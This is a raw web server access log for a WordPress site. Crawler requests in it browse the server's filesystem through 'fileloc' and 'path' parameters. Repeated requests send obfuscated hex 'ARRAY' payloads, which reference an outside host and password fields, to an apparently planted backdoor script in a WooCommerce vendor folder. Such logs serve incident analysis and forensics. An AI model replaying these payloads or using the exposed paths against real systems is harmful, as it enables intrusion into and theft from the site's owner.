216.73.216.129 - - [13/May/2026:12:16:06 -0400] "GET /p/beef%2032551826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FRequests%2Fsrc%2FCookie.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FRequests%2Fsrc HTTP/1.0" 200 10685 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:16:23 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/user.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 12185 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:16:38 -0400] "GET /p/atom%2022255817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Felementor%2Fapp HTTP/1.0" 200 7146 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:17:02 -0400] "GET /p/ball%2022651825?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-content%2Fplugins%2Fipafb HTTP/1.0" 200 7778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:12:50 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323337302p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383737302q3466366438663666633631353964393162663862643232636230663365616366222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:17:23 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-user.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 12184 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:17:32 -0400] "GET /p/atom%2022683817?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcomment-author-name HTTP/1.0" 200 7190 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:17:46 -0400] "GET /p/beef%2030163826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss%2Fwidgets.css&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fcss HTTP/1.0" 200 10431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:18:09 -0400] "GET /p/ball%2021543825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fprivacy.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin HTTP/1.0" 200 7731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:13:10 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323339302p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383739302q6136353237623939393539323466353065366366373233363834636439393338222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:18:24 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/index.html&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 6648 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:13:30 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323431302p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383831302q3565633135626263346364653833343061333062346265386364613061663933222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:18:33 -0400] "GET /p/beef%2031335826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fabilities-api.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes HTTP/1.0" 200 11815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:13:50 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323433302p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383833302q3162646131386138643861613065373266666539343661666261393263336333222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:19:03 -0400] "GET /p/bale%2012027824?path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fcustomize HTTP/1.0" 200 8435 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:14:10 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323435302p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383835302q3237366564656538373831393134373434333564656531383734656533383563222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:19:29 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-post.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 8310 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:14:57 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323439372p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383839372q6430623839333264383265636539326466393263353163623166663130396138222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:19:37 -0400] "GET /p/beef%2032915826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs%2Fwp-lists.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fjs HTTP/1.0" 200 11962 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:20:07 -0400] "GET /p/atom%2022255817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fshortcode.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks HTTP/1.0" 200 6946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:15:22 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323532322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383932322q6337366532323230366566636463353230366332303265313333383538663336222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:20:25 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/post.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 69545 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:20:41 -0400] "GET /p/atom%2022219817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks%2Fcalendar.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fblocks HTTP/1.0" 200 8547 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:15:42 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323534322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383934322q3265383837336263646131646233623634613936333937333036633065373038222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [13/May/2026:12:16:02 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323536322p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638383936322q6435383061616439303831303963666461663936366662613765323162666164222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:21:13 -0400] "GET /p/bale%2011183824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Feditor-expand.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 11287 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:21:17 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/post-formats.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 8476 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:17:08 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323632382p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393032382q6363393333633261323038323334373534336439393737386464346334333161222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:21:46 -0400] "GET /p/beef%2032551826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fimages%2Fmedia HTTP/1.0" 200 6739 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:22:03 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/post-thumbnail-template.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 8916 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:22:17 -0400] "GET /p/bale%2012575824?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Fword-count.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 7324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:18:11 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323639312p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393039312q6633333836303364303537613965393631643333386131306333333263326139222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:22:49 -0400] "GET /p/atom%2021323817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Fse.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6636 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:23:04 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/post-template.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 23130 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:23:21 -0400] "GET /p/ball%2022139825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs%2Faccess_ssl_log.webstat&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Flogs HTTP/1.0" 200 6617 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:18:31 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323731312p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393131312q3337383866646666343534356132326532336437393238613531303965393235222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:23:43 -0400] "GET /p/ball%2022319825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Fpassword-toggle.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 7003 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:18:51 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323733312p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393133312q6531313331656437646237366335623164383131393738356431313265363565222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
74.7.227.20 - - [13/May/2026:12:24:05 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/error-protection.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 8026 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:19:11 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323735312p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393135312q3563653262393062326464363663613030646464613330303362353732653138222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:24:15 -0400] "GET /p/atom%2021323817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Fpost-formats.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
107.191.43.201 - - [13/May/2026:12:20:18 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323831382p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393231382q3239653261663432393337346262373230623162306466613730656266326333222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
107.191.43.201 - - [13/May/2026:12:19:31 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323737312p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393137312q3465353261626330323239396662363863393366613534303634346338376638222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:24:36 -0400] "GET /p/atom%2021467817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages%2Ftoggige-arrow.jpg&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fimages HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:24:44 -0400] "GET /p/ball%2022963825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages%2Fpost-formats.png&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fimages HTTP/1.0" 200 6642 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:25:00 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/widgets.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 12185 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
216.73.216.129 - - [13/May/2026:12:25:17 -0400] "GET /p/atom%2022219817?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FID3%2Fmodule.audio.ac3.php&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2FID3 HTTP/1.0" 200 12185 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.129 - - [13/May/2026:12:25:48 -0400] "GET /p/beef%2032915826?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fphp-compat%2F.htaccess&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-includes%2Fphp-compat HTTP/1.0" 200 6733 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.20 - - [13/May/2026:12:25:51 -0400] "GET /?fileloc=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes/class-wp-user-meta-session-tokens.php&path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes HTTP/1.0" 200 7479 "https://ascensionfitnessusa.naluendorse.com/?path=/var/www/vhosts/ascensionfitnessusa.naluendorse.com/httpdocs/wp-includes" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
107.191.43.201 - - [13/May/2026:12:20:43 -0400] "GET /wp-content/plugins/woocommerce/vendor/symfony/polyfill-php80/Resources/stubs/stubs/index.php?ARRAY=7o2230223n313737383639323834332p2231223n22687474703n5p2s5p2s6p776n3132322r73696p76692r63616q5p2s3s6p633q7068705s636s64655s6n6326743q313737383638393234332q6634643032306132326533393961666135333364623237323265666236323662222p2232223n223863333730626666393962633931653932343435653333383966623665326466222p2233223n226337323238396637353332643736333933656134353438643033306533346137222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232352q34352q35322q36312q37372q38382q3236227q HTTP/1.0" 200 4031 "-" "-"
216.73.216.129 - - [13/May/2026:12:26:05 -0400] "GET /p/ball%2022963825?fileloc=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs%2Fuser-suggest.min.js&path=%2Fvar%2Fwww%2Fvhosts%2Fascensionfitnessusa.naluendorse.com%2Fhttpdocs%2Fwp-admin%2Fjs HTTP/1.0" 200 6993 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
